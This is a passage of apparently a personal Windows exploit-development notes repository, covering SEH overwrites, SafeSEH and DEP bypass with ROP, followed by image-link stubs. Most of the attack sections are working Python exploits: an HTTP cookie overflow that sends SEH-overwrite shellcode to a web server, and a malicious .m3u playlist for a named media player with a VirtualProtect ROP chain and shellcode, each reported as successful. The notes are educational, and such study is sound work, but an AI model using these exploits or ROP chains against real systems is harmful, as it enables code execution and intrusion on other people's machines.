 17 | typedef struct _EXCEPTION_REGISTRATION_RECORD { 
 18 |     struct _EXCEPTION_REGISTRATION_RECORD *Next; 
 19 |     PEXCEPTION_ROUTINE Handler; 
 20 | } EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
 21 | ```
 22 | 
 23 | the first member is a pointer to next _EXCEPTION_REGISTRATION_RECORD, the second member is a pointer to an exception handler function. The function looks like this:
 24 | 
 25 | ```
 26 | EXCEPTION_DISPOSITION 
 27 | __cdecl _except_handler(
 28 |     struct _EXCEPTION_RECORD *ExceptionRecord,
 29 |     oid EstablisherFrame,
 30 |     struct _CONTEXT *ContextRecord,
 31 |     void * DispatcherContext
 32 | );
 33 | ```
 34 | 
 35 | ContextRecord contains registers data when exceptions occur, and bellow is the definition of ExceptionRecord. 
 36 | ```
 37 | typedef struct _EXCEPTION_RECORD {
 38 |         DWORD ExceptionCode;
 39 |         DWORD ExceptionFlags;
 40 |         struct _EXCEPTION_RECORD *ExceptionRecord;
 41 |         PVOID ExceptionAddress;
 42 |         DWORD NumberParameters;
 43 |         DWORD ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
 44 | } EXCEPTION_RECORD;
 45 | ```
 46 | 
 47 | The _except_handler uses the above two information to determine whether this exception can be handled or not. If it can handle this exception, the return value of EXCEPTION_DISPOSITION is ExceptionContinueExecution. Else, it returns ExceptionContinueSearch to tell OS search next _EXCEPTION_REGISTRATION_RECORD.
 48 | 
 49 | How to locate SEH Chain?
 50 | ```
 51 | get the first Exception Registration Record
 52 | > !teb 
 53 | get the SEH chain of current thread
 54 | > !exchain
 55 | ```
 56 | 
 57 | 
 58 | ## Crash
 59 | ```
 60 | import socket
 61 | import os
 62 | import time
 63 | import sys
 64 | import struct
 65 | 
 66 | 
 67 | host = "192.168.95.149"
 68 | # Port of host
 69 | port = 80
 70 | BUF_SIZE = 3000
 71 | 
 72 | buf = "/.:/"                # Unusual, but needed
 73 | # Character pattern buffer to locate SEH offset
 74 | buf += "A" * BUF_SIZE
 75 |  
 76 | 
 77 |  
 78 | request = "GET /vfolder.ghp HTTP/1.1\r\n"
 79 | request += "Host: " + host + "\r\n"
 80 | request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
 81 | request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
 82 | request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
 83 | request += "Accept-Encoding: gzip, deflate" + "\r\n"
 84 | request += "Referer: " + "http://" + host + "/" + "\r\n"
 85 | request += "Cookie: SESSIONID=16246; UserID=PassWD=" + buf + "; frmUserName=; frmUserPass=;"    # Insert buffer here
 86 | request += " rememberPass=pass"
 87 | request += "\r\n"
 88 | request += "Connection: keep-alive" + "\r\n"
 89 | request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
 90 | 
 91 | print "[*] Connecting to target: " + host
 92 | 
 93 | # Set up our socket connection
 94 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 95 | 
 96 | try:
 97 |     # Attempt to connect to host
 98 |     connect = s.connect((host, port))
 99 |     print "[*] Successfully connected to: " + host
100 | except:
101 |     print "[!] " + host + " didn't respond...\n"
102 |     sys.exit(0)
103 | 
104 | # Send payload to target
105 | print "[*] Sending payload to target..."
106 | s.send(request + "\r\n\r\n")
107 | print "[!] Payload has been sent!\n"
108 | s.close()
109 | ```
110 | 
111 | ![](Part2-SEHExploit/Part2-SEHExploit1.png)
112 | 
113 | ![](Part2-SEHExploit/Part2-SEHExploit2.png)
114 | 
115 | ![](Part2-SEHExploit/Part2-SEHExploit3.png)
116 | 
117 | 
118 | ## Jump to shellcode
119 | 1. Foud SEH offset is 53 (with Mona), fake SEH get called
120 | 
121 | 2. Found a pointer to "Pop Pop Ret", Jump to Next SEH
122 | ```
123 | >!py mona seh
124 | ```
125 | 
126 | Using a code section of the application itself would make our exploit less dependent on OS.
127 | 
128 | ** Don't pick a code section which contains \x00, it's EOF in a string and could lead to exploit fail.**
129 | 
130 | ![](Part2-SEHExploit/Part2-SEHExploit6.png)
131 | 
132 | 3. Found the opcode of Jump 0x10, Jump to Payload
133 | 
134 | 
135 | We have talked this in [previous blog](Part1-StackOverflow.md), it is "\xeb\x10".
136 | 
137 | Since next seh is a 4 bytes pointer, let's pad it to 4 bytes with "\x90\x90".
138 | 
139 | ![](Part2-SEHExploit/Part2-SEHExploit7.png)
140 | 
141 | 
142 | ```
143 | import socket
144 | import os
145 | import time
146 | import sys
147 | import struct
148 | 
149 | 
150 | host = "192.168.95.149"
151 | # Port of host
152 | port = 80
153 | BUF_SIZE = 3000
154 | 
155 | buf = "/.:/"                # Unusual, but needed
156 | # Character pattern buffer to locate SEH offset
157 | buf += "A" * 53
158 |  
159 | nseh = "\xeb\x10\x90\x90"
160 | seh = struct.pack("<L", 0x1001ab5f)
161 | 
162 | #payload = "\x90" * 24 + "\xcc"*20
163 | 
164 | nops = "\x90" * 24
165 | # Calc.exe shellcode payload
166 | payload = "\x31\xC9"                # xor ecx,ecx
167 | payload += "\x51"                   # push ecx
168 | payload += "\x68\x63\x61\x6C\x63"   # push 0x636c6163
169 | payload += "\x54"                   # push dword ptr esp
170 | payload += "\xB8\xC7\x93\xC2\x77"   # mov eax,0x77c293c7
171 | payload += "\xFF\xD0"               # call eax
172 | 
173 | exploit = buf + nseh + seh + nops + payload
174 | 
175 | fill = "\x43"*(BUF_SIZE-len(exploit))   # Calculate number of filler bytes to use (C)
176 | buf = exploit + fill    
177 |  
178 | request = "GET /vfolder.ghp HTTP/1.1\r\n"
179 | request += "Host: " + host + "\r\n"
180 | request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
181 | request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
182 | request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
183 | request += "Accept-Encoding: gzip, deflate" + "\r\n"
184 | request += "Referer: " + "http://" + host + "/" + "\r\n"
185 | request += "Cookie: SESSIONID=16246; UserID=PassWD=" + buf + "; frmUserName=; frmUserPass=;"    # Insert buffer here
186 | request += " rememberPass=pass"
187 | request += "\r\n"
188 | request += "Connection: keep-alive" + "\r\n"
189 | request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
190 | 
191 | print "[*] Connecting to target: " + host
192 | 
193 | # Set up our socket connection
194 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
195 | 
196 | try:
197 |     # Attempt to connect to host
198 |     connect = s.connect((host, port))
199 |     print "[*] Successfully connected to: " + host
200 | except:
201 |     print "[!] " + host + " didn't respond...\n"
202 |     sys.exit(0)
203 | 
204 | # Send payload to target
205 | print "[*] Sending payload to target..."
206 | s.send(request + "\r\n\r\n")
207 | print "[!] Payload has been sent!\n"
208 | s.close()
209 | ```
210 | 
211 | Exploit Success!
212 | 
213 | ![](Part2-SEHExploit/Part2-SEHExploit5.png)
214 | 
215 | ## Bypassing SafeSeh 
216 | 
217 | ** Some read notes from [corelan's awesome paper](https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/) **
218 | 
219 | When an exception handler pointer is about to get called, ntdll.dll (KiUserExceptionDispatcher) will check to see if this pointer is in fact a valid EH pointer.
220 | 
221 | 1. First, it tries to eliminate that the code would jump back to an address on the stack directly.It does this by getting the stack high and low address (by looking at the Thread Environment Block’s (TEB) entry, looking at FS:[4] and FS:[8]). If the exception pointer is within that range (thus, if it points to an address on the stack), the handler will not be called.
222 | 2. If the handler pointer is not a stack address, the address is checked against the list of loaded modules (and the executable image itself), to see whether it falls within the address range of one of these modules. If the address does not fall within the range of a loaded module ? Well, in that case, the handler is considered safe and will be called. 
223 | 3. If the address falls within the range of a loaded module, but the module does not have a Load Configuration Directory(/safeseh:no), the handler would be called. If that isn't the case, the pointer is checked against the list of registered handlers. If there is a match, the pointer is allowed.
224 | 
225 | So, there are a couple of possible exploit techniques for this new type of SEH protections :
226 | 
227 | - If the address of the handler, as taken from the exception_registration structure, is outside the address range of a loaded module, then it is still executed.
228 | 
229 | - If the address of the handler is inside the address range of a loaded module, but this loaded module does not have a Load Configuration Directory, and the DLL characteristics would allow us to pass the SE Handler verification test, the pointer will get called.
230 | 
231 | - If the pointer to the exception handler is overwritten with a heap address, it will be called. (Of course, this involves loading your exploit in the heap and then trying to guess a more or less reliable address on the heap where you can redirect the application flow to. This may be difficult because this address may not be predictable).
232 | 
233 | 
234 | 
235 | Besides "Pop Pop Ret", Bellow addreses are more compatible with different versions of OS if one of them points to the exception_registration structure.
236 | 
237 | call dword ptr[esp+nn]� / jmp dword ptr[esp+nn]� / call dword ptr[ebp+nn]� / jmp dword ptr[ebp+nn]� / call dword ptr[ebp-nn]� / jmp dword ptr[ebp-nn]
238 | 
239 | ```
240 | > !py mona jseh
241 | ```
242 | 
243 | ## Ref
244 | 1. http://www.shogunlab.com/blog/2017/11/06/zdzg-windows-exploit-4.html
245 | 2. https://www.securitysift.com/windows-exploit-development-part-6-seh-exploits/


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit0.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit1.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit2.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit3.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit5.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit6.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part2-SEHExploit/Part2-SEHExploit7.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP.md:
--------------------------------------------------------------------------------
  1 | # Part3： Bypass DEP with ROP
  2 | 
  3 | ## Get things setup
  4 | 1. Win7 X86
  5 | 2. [vulnerable software](https://www.exploit-db.com/apps/39adeb7fa4711cd1cac8702fb163ded5-vuplayersetup.exe)
  6 | 3. Enable DEP(need to restart computer)
  7 | ![](Part3-BypassDEPwithROP/Part3-ROP0.png)
  8 | 
  9 | ## Introduction to DEP
 10 | 1. windows系统DEP policy及设置
 11 | 
 12 | ![](Part3-BypassDEPwithROP/Part3-BypassDEPwithROP0.png)
 13 | 
 14 | ```
 15 | bcdedit.exe /set nx OptIn
 16 | bcdedit.exe /set nx OptOut
 17 | bcdedit.exe /set nx AlwaysOn
 18 | bcdedit.exe /set nx AlwaysOff
 19 | ```
 20 | 
 21 | 2. 编译器的/NXCOMPAT选项表示程序期望enbale DEP, 如果此时系统设置为AlwaysOff，也无法enable DEP； 反之，如果程序disable DEP，但系统设置为Opt-Out/Always On, 程序也是受DEP保护的。
 22 | 
 23 | 3. 程序最终的DEP Status有以下三种：
 24 | 
 25 | - Disable
 26 | - DEP
 27 | - DEP(permanent)
 28 | 
 29 | ![](Part3-BypassDEPwithROP/Part3-BypassDEPwithROP2.png)
 30 | 
 31 | DEP(permanent) 我理解是以下两种情况之一导致的：
 32 | 
 33 | (1)程序本身link with /NXCOMPAT option，且系统当前DEP Policy允许enable DEP
 34 | 
 35 | (2)通过SetProcessDEPPolicy(PROCESS_DEP_ENABLE) enable了DEP
 36 | 
 37 | 
 38 | ## Bypassing DEP
 39 | ** Bellow are some reading notes of [Corelan's paper](https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/)**
 40 | 
 41 | These existing functions will provide us with the following options :
 42 | - execute commands (WinExec for example – classic "ret-to-libc")
 43 | - mark the page (stack for example) that contains your shellcode as executable (if that is allowed by the active DEP policy) and jump to it
 44 | - copy data into executable regions and jump to it. (We *may* have to allocate memory and mark the region as executable first)
 45 | - change the DEP settings for the current process before running shellcode
 46 | 
 47 | 
 48 | 1. VirtualAlloc(MEM_COMMIT + PAGE_READWRITE_EXECUTE) + copy memory
 49 | ```
 50 | functions for copy memory:
 51 |     memcpy()
 52 |     WriteProcessMemory()
 53 | ```
 54 | 
 55 | 2. HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc() + copy memory
 56 | 
 57 | 3. SetProcessDEPPolicy()
 58 | ** has some limitaion when DEP status is "AlwaysOn/AlwaysOff/Permanent DEP", not very clear, just comments here. **
 59 | 
 60 | This function requires one parameter, and this parameter must be set to 0 to disable DEP for the current process.
 61 | 
 62 | 4. NtSetInformationProcess()
 63 | ** has some limitaion when DEP status is "AlwaysOn/AlwaysOff/Permanent DEP", not very clear, just comments here. **
 64 | This function will change the DEP policy for the current process so you can execute your shellcode from the stack.
 65 | 
 66 | ```
 67 | NtSetInformationProcess(
 68 |    NtCurrentProcess(),    // (HANDLE)-1
 69 |    ProcessExecuteFlags,   // 0x22
 70 |    &ExecuteFlags,         // ptr to 0x2
 71 |    sizeof(ExecuteFlags)); // 0x4
 72 | ```
 73 | 
 74 | 5. VirtualProtect(PAGE_READ_WRITE_EXECUTE)
 75 | 
 76 | 6. WriteProcessMemory()
 77 | 
 78 | This function will allow you to copy your shellcode to another (executable) location so you can jump to it & execute it. During the copy, WriteProcessMemory() will temporarily mark the location as writeable, you only have to make sure the target destination is executable.
 79 | 
 80 | 
 81 | - WPM Technique 1 : full WPM() call
 82 | 
 83 | After the copy, WriteProcessMemory() will mark the location as unwritable. If your shellcode prepends with a decoder, it will not work. Consider prepends with a call to virtualprotect or so, to mark the current region as writable / executable
 84 | 
 85 | 
 86 | - WPM Technique 2 : patch WPM() itself
 87 | ![](Part3-BypassDEPwithROP/Part3-BypassDEPwithROP3.png)
 88 | 
 89 | 
 90 | In order to call windows API to change the access protection level, we need to pass a number of parameters to them, and these parameters need to sit at the top of the stack at the time the function gets called.
 91 | 
 92 | There are a few ways to do this:
 93 | - We can put the required values in registers and then issue a pushad (which will put everything on the stack in one time). 
 94 | - A second technique would be to put some of the parameters (the static ones/the ones without null bytes) on the stack already, and use some ROP gadgets to calculate the other parameters and write them onto the stack (using some kind of sniper technique).
 95 | 
 96 | ![](Part3-BypassDEPwithROP/Part3-BypassDEPwithROP4.png)
 97 | 
 98 | ```
 99 | stack pivot instructions:
100 | add esp, offset + ret
101 | mov esp, register + ret
102 | xchg register,esp + ret
103 | call register                         (if a register points to data you control)
104 | mov reg,[ebp+0c] + call reg           (or other references to seh record)
105 | push reg + pop esp + ret              (if you control ‘reg’)
106 | mov reg, dword ptr fs:[0] + … + ret   (set esp indirectly, via SEH record)
107 | 
108 | ROP NOP: 
109 | pointers which point to #RET
110 | 
111 | ```
112 | 
113 | 
114 | ## Crash POC
115 | ```
116 | import struct
117 | 
118 | buf_size = 3000
119 | 
120 | buf = 'A' * buf_size
121 | 
122 | print "[+] Creating .m3u file of size "+ str(len(buf))
123 |  
124 | file = open('vuplayer-dep.m3u','w');
125 | file.write(buf);
126 | file.close();
127 |  
128 | print "[+] Done creating the file"
129 | ```
130 | 
131 | ![](Part3-BypassDEPwithROP/Part3-ROP1.png)
132 | 
133 | ## Data Execution Prevention
134 | Use mona to customize our exploit.
135 | 
136 | ```
137 | > !py mona pattern_offset
138 | > !py jmp -r esp
139 | ```
140 | 
141 | ```
142 | import struct
143 | 
144 | buf_size = 3000
145 | 
146 | 
147 | junk = "A"*1012
148 | eip = struct.pack("<L", 0x100222c5)
149 | 
150 | nops = "\x90" * 24
151 | shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
152 | shellcode += "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
153 | shellcode += "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
154 | shellcode += "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
155 | shellcode += "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
156 | shellcode += "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
157 | shellcode += "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
158 | shellcode += "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
159 | shellcode += "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
160 | shellcode += "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
161 | shellcode += "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
162 | shellcode += "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
163 | shellcode += "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
164 | shellcode += "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
165 | shellcode += "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
166 | shellcode += "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
167 | shellcode += "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
168 | shellcode += "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
169 | shellcode += "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
170 | shellcode += "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
171 | shellcode += "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
172 | shellcode += "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
173 | shellcode += "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
174 | shellcode += "\x40\xFF\x54\x24\x40\x57\xFF\xD0";
175 | 
176 | 
177 | exploit = junk + eip + nops + shellcode
178 | fill = "\x43" * (buf_size - len(exploit))
179 | buf = exploit + fill
180 | 
181 | 
182 |  
183 | print "[+] Creating .m3u file of size "+ str(len(buf))
184 |  
185 | file = open('vuplayer-dep.m3u','w');
186 | file.write(buf);
187 | file.close();
188 |  
189 | print "[+] Done creating the file"
190 | ```
191 | 
192 | ![](Part3-BypassDEPwithROP/Part3-ROP2.png)
193 | 
194 | ## Make shellcode area executable
195 | Here we are using [VirtualProtect function](https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualprotect) to change the memory protection option of the calling process. 
196 | 
197 | ```
198 | BOOL VirtualProtect(
199 |   LPVOID lpAddress,
200 |   SIZE_T dwSize,
201 |   DWORD  flNewProtect,
202 |   PDWORD lpflOldProtect
203 | );
204 | ```
205 | 
206 | What we're going to do is collect a bunch of existing assembly instructions that aren't marked as non-executable by DEP and chain them to call VirtualProtect to make the shellcode executable. Let's use mona to help us! 
207 | 
208 | ```
209 | we don't like '\x00' in our exploit
210 | > mona.py rop -cpb '\x00'
211 | ```
212 | 
213 | ```
214 | def create_rop_chain():
215 | 
216 |     # rop chain generated with mona.py - www.corelan.be
217 |     rop_gadgets = [
218 |       0x1001d892,  # POP EBP # RETN [BASS.dll] 
219 |       0x1001d892,  # skip 4 bytes [BASS.dll]
220 |       0x10015f77,  # POP EAX # RETN [BASS.dll] 
221 |       0xfffffdff,  # Value to negate, will become 0x00000201
222 |       0x10014db4,  # NEG EAX # RETN [BASS.dll] 
223 |       0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
224 |       0x10015f82,  # POP EAX # RETN [BASS.dll] 
225 |       0xffffffc0,  # Value to negate, will become 0x00000040
226 |       0x10014db4,  # NEG EAX # RETN [BASS.dll] 
227 |       0x10038a6c,  # XCHG EAX,EDX # RETN [BASS.dll] 
228 |       0x106040c0,  # POP ECX # RETN [BASSMIDI.dll] 
229 |       0x1010892e,  # &Writable location [BASSWMA.dll]
230 |       0x10603658,  # POP EDI # RETN [BASSMIDI.dll] 
231 |       0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
232 |       0x10606b61,  # POP ESI # RETN [BASSMIDI.dll] 
233 |       0x100177e4,  # JMP [EAX] [BASS.dll]
234 |       0x10015f82,  # POP EAX # RETN [BASS.dll] 
235 |       0x10040284,  # ptr to &VirtualProtect() [IAT BASS.dll]
236 |       0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
237 |       0x100222c5,  # ptr to 'jmp esp' [BASS.dll]
238 |     ]
239 |     return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
240 | ```
241 | 
242 | 
243 | In Part1-StackOverflow, we want progress jump to esp, so we put a pointer that point to "jmp esp" into eip.
244 | 
245 | For now, we want progress jump to [esp], so we put a pointer that point to "RETN" into eip.
246 | ```
247 | import struct
248 | 
249 | buf_size = 3000
250 | 
251 | def create_rop_chain():
252 | 
253 |     # rop chain generated with mona.py - www.corelan.be
254 |     rop_gadgets = [
255 |       0x1001d892,  # POP EBP # RETN [BASS.dll] 
256 |       0x1001d892,  # skip 4 bytes [BASS.dll]
257 |       0x10015f77,  # POP EAX # RETN [BASS.dll] 
258 |       0xfffffdff,  # Value to negate, will become 0x00000201
259 |       0x10014db4,  # NEG EAX # RETN [BASS.dll] 
260 |       0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
261 |       0x10015f82,  # POP EAX # RETN [BASS.dll] 
262 |       0xffffffc0,  # Value to negate, will become 0x00000040
263 |       0x10014db4,  # NEG EAX # RETN [BASS.dll] 
264 |       0x10038a6c,  # XCHG EAX,EDX # RETN [BASS.dll] 
265 |       0x106040c0,  # POP ECX # RETN [BASSMIDI.dll] 
266 |       0x1010892e,  # &Writable location [BASSWMA.dll]
267 |       0x10603658,  # POP EDI # RETN [BASSMIDI.dll] 
268 |       0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
269 |       0x10606b61,  # POP ESI # RETN [BASSMIDI.dll] 
270 |       0x100177e4,  # JMP [EAX] [BASS.dll]
271 |       0x10015f82,  # POP EAX # RETN [BASS.dll] 
272 |       0x10040284,  # ptr to &VirtualProtect() [IAT BASS.dll]
273 |       0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
274 |       0x100222c5,  # ptr to 'jmp esp' [BASS.dll]
275 |     ]
276 |     return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
277 | 
278 | 
279 | junk = "A"*1012
280 | eip = struct.pack("<L", 0x1001d893)  #ptr to 'RETN' in BASS.dll
281 | 
282 | rop_chain = create_rop_chain()
283 | nops = "\x90" * 24
284 | shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
285 | shellcode += "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
286 | shellcode += "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
287 | shellcode += "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
288 | shellcode += "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
289 | shellcode += "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
290 | shellcode += "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
291 | shellcode += "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
292 | shellcode += "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
293 | shellcode += "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
294 | shellcode += "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
295 | shellcode += "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
296 | shellcode += "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
297 | shellcode += "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
298 | shellcode += "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
299 | shellcode += "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
300 | shellcode += "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
301 | shellcode += "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
302 | shellcode += "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
303 | shellcode += "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
304 | shellcode += "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
305 | shellcode += "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
306 | shellcode += "\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
307 | shellcode += "\x40\xFF\x54\x24\x40\x57\xFF\xD0";
308 | 
309 | 
310 | exploit = junk + eip  + rop_chain + nops + shellcode
311 | fill = "\x43" * (buf_size - len(exploit))
312 | buf = exploit + fill
313 | 
314 |  
315 | print "[+] Creating .m3u file of size "+ str(len(buf))
316 |  
317 | file = open('vuplayer-dep.m3u','w');
318 | file.write(buf);
319 | file.close();
320 |  
321 | print "[+] Done creating the file"
322 | ```
323 | 
324 | Exploit Success!
325 | 
326 | ![](Part3-BypassDEPwithROP/Part3-ROP3.png)
327 | 
328 | ## Ref
329 | 1. https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP0.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP1.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP2.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP3.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-BypassDEPwithROP4.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP0.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP1.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP2.png


